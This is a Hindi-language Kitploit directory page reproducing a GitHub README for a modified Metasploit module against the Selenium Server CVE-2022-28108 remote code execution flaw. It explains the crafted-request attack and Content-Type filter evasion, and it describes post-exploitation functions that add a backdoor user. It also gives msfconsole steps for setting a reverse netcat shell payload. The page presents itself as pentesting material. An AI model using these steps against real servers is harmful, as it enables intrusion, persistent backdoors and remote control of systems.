Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/zeroethical/cve-2022-28108
शोषण फ्रेमवर्कभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubzeroethical/cve-2022-28108

CVE-2022-28108

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Selenium Chrome RCE एक्सप्लॉइट (विस्तारित)

इस रिपॉज़िटरी में Metasploit मॉड्यूल का एक संशोधित संस्करण है जो Selenium Server (Grid) के पुराने संस्करणों में Remote Code Execution (RCE) भेद्यता का फायदा उठाता है।

इस कोड का उपयोग करने से पहले कृपया इस README को ध्यान से पढ़ें।


मूल कोड की स्वीकृति:

यह मॉड्यूल CVE-2022-28108 के लिए Metasploit मॉड्यूल के मूल लेखकों के उत्कृष्ट कार्य पर आधारित है। Selenium Server भेद्यता का फायदा उठाने की मुख्य कार्यक्षमता काफी हद तक उनके कार्यान्वयन पर आधारित है। हम सुरक्षा समुदाय में उनके योगदान को स्वीकार करते हैं और उसकी सराहना करते हैं।

  • मूल Metasploit मॉड्यूल: आप मूल मॉड्यूल को Metasploit Framework के भीतर पा सकते हैं।
  • मूल लेखक: मूल लेखकों को मॉड्यूल के भीतर ही श्रेय दिया गया है (आमतौर पर 'Author' अनुभाग में)। उनके विशिष्ट नामों के लिए कृपया मूल मॉड्यूल देखें।

शोषित भेद्यता:

यह मॉड्यूल CVE-2022-28108 को लक्षित करता है, जो Selenium Server (Grid) के 4.0.0-alpha-7 से पहले के संस्करणों में एक Cross-Site Request Forgery (CSRF) भेद्यता है। यह भेद्यता इसलिए उत्पन्न होती है क्योंकि सर्वर कुछ अनुरोधों के लिए गैर-JSON सामग्री प्रकारों (जैसे text/plain, application/x-www-form-urlencoded, और multipart/form-data) की अनुमति देता है। एक हमलावर इसका फायदा उठाकर दुर्भावनापूर्ण अनुरोध भेज सकता है, जिससे सर्वर पर Remote Code Execution (RCE) हो सकता है।

मूल कोड कैसे काम करता है:

मूल Metasploit मॉड्यूल भेद्यता का फायदा उठाने के लिए असुरक्षित Selenium Server के /wd/hub/session एंडपॉइंट पर एक निर्मित POST अनुरोध भेजता है। यह अनुरोध गैर-JSON Content-Type (विशेष रूप से text/plain) का उपयोग करता है और वांछित ब्राउज़र क्षमताओं के भीतर goog:chromeOptions में दुर्भावनापूर्ण कॉन्फ़िगरेशन शामिल करता है। यह एक हमलावर को एक मनमाना बाइनरी (जैसे /usr/bin/python3) और तर्क निर्दिष्ट करने की अनुमति देता है, जो नया ब्राउज़र सत्र शुरू होने पर सर्वर पर निष्पादित होते हैं।

इस संस्करण में संशोधन और संवर्द्धन:

इस रिपॉज़िटरी में मूल Metasploit मॉड्यूल का एक संशोधित संस्करण है। मुख्य संशोधनों में शामिल हैं:

  • Content-Type से बचाव (Evasion): संशोधित मॉड्यूल दुर्भावनापूर्ण अनुरोध को कई अलग-अलग Content-Type हेडर के साथ भेजकर भेद्यता का फायदा उठाने का प्रयास करता है। इसमें text/plain, application/x-www-form-urlencoded, और multipart/form-data शामिल हैं। ऐसा संभावित रूप से बुनियादी फ़िल्टरिंग या पहचान तंत्रों को बायपास करने के लिए किया जाता है जो किसी विशिष्ट Content-Type की तलाश कर सकते हैं।
  • execute_post_exploitation फ़ंक्शन: एक नया फ़ंक्शन execute_post_exploitation(session_response) जोड़ा गया है। यह फ़ंक्शन सफल शोषण के बाद कॉल किया जाता है और बुनियादी पोस्ट-एक्सप्लॉइटेशन कार्य करने का लक्ष्य रखता है। वर्तमान कार्यान्वयन में, इसमें शामिल हैं:
    • सिस्टम में बैकडोर उपयोगकर्ता जोड़ने का प्रयास करना।
    • बुनियादी सिस्टम जानकारी एकत्र करना (उपयोगकर्ता नाम, ID, कर्नेल संस्करण)।
  • execute_command_on_target फ़ंक्शन: एक और नया फ़ंक्शन execute_command_on_target(command) जोड़ा गया है। यह फ़ंक्शन सफल शोषण के बाद लक्ष्य सिस्टम पर मनमाने कमांड निष्पादित करने की अनुमति देता है। इसका उपयोग execute_post_exploitation फ़ंक्शन के भीतर किया जाता है और इसे आगे की पोस्ट-एक्सप्लॉइटेशन गतिविधियों के लिए विस्तारित किया जा सकता है।

मुख्य अंतर उजागर:

मुख्य अंतर exploit विधि और दो नए फ़ंक्शनों के जुड़ने में है।

  • मूल exploit विधि: Content-Type: text/plain के साथ एक एकल अनुरोध भेजने पर केंद्रित थी।
  • संशोधित exploit विधि: विभिन्न Content-Type मानों के माध्यम से पुनरावृति करती है, प्रत्येक के साथ शोषण का प्रयास करती है। सफल शोषण पर, यह execute_post_exploitation फ़ंक्शन को कॉल करती है।
  • नए फ़ंक्शन: execute_post_exploitation और execute_command_on_target फ़ंक्शन इस संशोधित संस्करण में पूरी तरह से नए जोड़ हैं, जो विस्तारित पोस्ट-एक्सप्लॉइटेशन क्षमताएं प्रदान करते हैं।

संशोधित मॉड्यूल का उपयोग कैसे करें:

  1. सुनिश्चित करें कि आपके पास Metasploit Framework स्थापित है।
  2. संशोधित कोड सहेजें: दिए गए Ruby कोड को एक .rb फ़ाइल के रूप में सहेजें (उदाहरण के लिए, selenium_rce_extended.rb)।
  3. मॉड्यूल को Metasploit मॉड्यूल निर्देशिका में रखें: सहेजी गई फ़ाइल को उपयुक्त Metasploit मॉड्यूल निर्देशिका में कॉपी करें। यह आमतौर पर /usr/share/metasploit-framework/modules/exploits/ या ~/.msf4/modules/exploits/ पर स्थित होती है। सटीक स्थान के लिए अपने Metasploit इंस्टॉलेशन को देखें।
  4. Metasploit कंसोल शुरू करें: एक टर्मिनल खोलें और msfconsole चलाएं।
  5. मॉड्यूल लोड करें: Metasploit कंसोल में, use exploit/selenium_rce_extended कमांड का उपयोग करें (या वह पथ जहां आपने फ़ाइल सहेजी है यदि आपने इसे उपनिर्देशिका में रखा है)।
  6. लक्ष्य कॉन्फ़िगर करें: असुरक्षित Selenium Server का लक्ष्य IP पता और पोर्ट सेट करें:
    root@kitploit:~
    msf6 exploit(selenium_rce_extended) > set RHOSTS <target_ip>
    msf6 exploit(selenium_rce_extended) > set RPORT <target_port>
    
    (Selenium Grid के लिए डिफ़ॉल्ट पोर्ट अक्सर 4444 होता है)।
  7. पेलोड सेट करें: लक्ष्य सिस्टम पर निष्पादित करने के लिए एक पेलोड चुनें। उदाहरण के लिए, रिवर्स शेल पाने के लिए:
    root@kitploit:~
    msf6 exploit(selenium_rce_extended) > set PAYLOAD cmd/unix/reverse_netcat
    msf6 exploit(selenium_rce_extended) > set LHOST <your_ip>
    msf6 exploit(selenium_rce_extended) > set LPORT <your_port>
    

महत्वपूर्ण विचार (अस्वीकरण):

  • इस कोड का जिम्मेदारीपूर्वक और नैतिक रूप से उपयोग करें। यह मॉड्यूल शैक्षिक उद्देश्यों और सुरक्षा पेशेवरों के लिए उनके सिस्टम की सुरक्षा का परीक्षण और मूल्यांकन करने के लिए प्रदान किया गया है।
  • सुनिश्चित करें कि आपके पास लक्ष्य सिस्टम के विरुद्ध परीक्षण करने की स्पष्ट अनुमति है। इस कोड का अनधिकृत उपयोग अवैध और अनैतिक है।
  • इसमें शामिल जोखिमों को समझें। भेद्यताओं का शोषण करने के अनपेक्षित परिणाम हो सकते हैं और लक्ष्य सिस्टम को अस्थिर कर सकता है।
  • पृथक और नियंत्रित वातावरण में परीक्षण करें। हमेशा ऐसे वातावरण में परीक्षण करें जहां आपका पूर्ण नियंत्रण हो और आप किसी भी संभावित क्षति को कम कर सकें।
  • पोस्ट-एक्सप्लॉइटेशन फ़ंक्शन बुनियादी उदाहरण हैं। आपको अपनी विशिष्ट आवश्यकताओं और लक्ष्य वातावरण के आधार पर उन्हें संशोधित या विस्तारित करने की आवश्यकता हो सकती है।

दायित्व अस्वीकरण:

इस संशोधित कोड के लेखक इस मॉड्यूल के उपयोग से होने वाले किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं। इस कोड का उपयोग करके, आप अपने कार्यों की पूरी जिम्मेदारी लेने के लिए सहमत होते हैं।

लाइसेंस:

यह संशोधित कोड संभवतः मूल Metasploit Framework के समान लाइसेंस (आमतौर पर MSF लाइसेंस) के अंतर्गत कवर किया गया है। विवरण के लिए कृपया मूल Metasploit Framework लाइसेंस देखें।

योगदान:

इस मॉड्यूल में योगदान और सुधार का स्वागत है। कृपया बग फिक्स, संवर्द्धन या नई सुविधाओं के साथ पुल अनुरोध सबमिट करने के लिए स्वतंत्र महसूस करें।

स्वीकृतियां:

हम CVE-2022-28108 के लिए Metasploit मॉड्यूल के मूल लेखकों के प्रति अपनी कृतज्ञता दोहराते हैं। उनका कार्य इस संशोधित मॉड्यूल की नींव बनाता है।

टूल डाउनलोड करें
  • एक्सप्लॉइट चलाएं: exploit कमांड के साथ मॉड्यूल निष्पादित करें।